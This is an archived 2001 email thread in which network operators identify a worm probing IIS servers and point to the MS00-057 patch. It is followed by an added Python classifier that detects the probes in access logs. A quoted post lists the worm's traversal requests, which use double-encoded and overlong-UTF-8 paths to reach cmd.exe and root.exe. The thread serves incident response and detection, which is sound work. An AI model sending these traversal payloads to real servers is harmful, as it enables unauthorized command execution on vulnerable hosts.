|> -----Original Message-----
|> From: Jaco Engelbrecht [mailto:bje@serendipity.org.za]
|> Sent: Tuesday, September 18, 2001 9:01 AM
|> To: Roeland Meyer
|> Subject: Re: Worm probes
|>
|> Hi,
|>
|> Sorry for emailing you directly, but I can't post to the nanog list.
|> It's `Code Blue` that's going around atm.
|>
|> Will bounce you a separate message now.
|>
|> Regards,
|> Jaco
|>
|> -----Original Message-----
From: "Jaco Engelbrecht" <bje@serendipity.org.za>
To: "Roeland Meyer" <rmeyer@mhsc.com>
Subject: Fw: [hamster@vom.tm: Re: New worm going 'round?] (fwd)
Date: Tue, 18 Sep 2001 18:05:18 +0200

|> From: Jaco Engelbrecht [mailto:bje@serendipity.org.za]
|> Sent: Tuesday, September 18, 2001 9:05 AM
|> To: Roeland Meyer
|> Subject: Fw: [hamster@vom.tm: Re: New worm going 'round?] (fwd)
|> Importance: High
|>
|> Hi Roland,
|>
|> `Code Blue` - see
|> http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fsection%3Dexploit%26vid%3D1806
|>
|> And for the solution:
|> "The patch released with the advisory MS00-057
|> (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp)
|> eliminates this vulnerability, therefore those who have already
|> applied this patch do not have to take any further action. Otherwise,
|> the patch is available at the following locations:
|>
|> IIS 4.0 http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
|> IIS 5.0 http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp"
|>
|> Regards,
|> Jaco
|>
|> --
|> bje@serendipity.org.za
|> the faculty of making fortunate discoveries
|>
|> ----- Forwarded message from The Flying Hamster <hamster@vom.tm> -----
|>
|> Date: Tue, 18 Sep 2001 15:36:20 +0100
|> From: The Flying Hamster <hamster@vom.tm>
|> To: list@inet-access.net
|> Subject: Re: New worm going 'round?
|> Reply-To: list@inet-access.net
|>
|> On Tue, Sep 18, 2001 at 10:31:59AM -0400, Gerald T. Freymann wrote:
|> > If I tail -f httpd-error.log these errors are going by faster than I can
|> > read! omg!
|>
|> Same here, the signature requests appear to be
|>
|> GET /MSADC/root.exe?/c+dir HTTP/1.0
|> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /_vti_bin/..%255c../..%25
|> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/root.exe?/c+dir HTTP/1.0
|>
|> It looks like each of these is tried against each IP being probed.
|>
|> --
|> The Flying Hamster <hamster@suespammers.org>
|> http://hamster.wibble.org/
|> "Unarmed...and extremely attractive." -- Dana Scully on Windows 95
|>
|> ----- End forwarded message -----
|>
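
Added example (not part of the original thread and not code from any of the posters): a small log classifier for the probe requests listed above, which decodes each request path the way the probes rely on and tags what it finds. It assumes Common Log Format style lines and models a non-strict two-byte UTF-8 decoder; the names classify, fold_two_byte and SAMPLE are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote_to_bytes

SHELLS = {b"cmd.exe", b"root.exe"}        # binaries named in the probe list
REQ = re.compile(r"\b(?:GET|HEAD|POST) (\S+)")

def fold_two_byte(raw):
    # Assumption: model a non-strict UTF-8 decoder, where a 0xC0/0xC1 lead
    # byte plus the next byte collapses to one ASCII character.
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return bytes(out)

def classify(line):
    """Return the set of probe indicators found in one log line."""
    m = REQ.search(line)
    if not m:
        return set()
    path = m.group(1).split("?", 1)[0].encode("latin-1", "replace")
    tags, rounds = set(), 0
    while rounds < 4:                     # percent-decode until stable
        decoded = unquote_to_bytes(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    if rounds > 1:                        # e.g. %255c -> %5c -> backslash
        tags.add("double-encoded")
    folded = fold_two_byte(path)
    if folded != path:                    # e.g. %c0%af -> '/'
        tags.add("overlong")
    parts = folded.replace(b"\\", b"/").lower().split(b"/")
    if b".." in parts:
        tags.add("traversal")
    if parts[-1] in SHELLS:
        tags.add("shell")
    return tags

# Constructed access-log lines (documentation addresses, made-up timestamps).
SAMPLE = [
    '192.0.2.7 - - [18/Sep/2001:15:30:01 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.7 - - [18/Sep/2001:15:30:01 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.9 - - [18/Sep/2001:15:30:02 +0100] "GET /docs/my%20file.html HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(sorted(classify(entry)) or "clean", "<-", entry.split('"')[1])
```

Matching on the decoded path rather than on literal strings is what lets one rule cover every encoding variant in the list, including ones not seen yet.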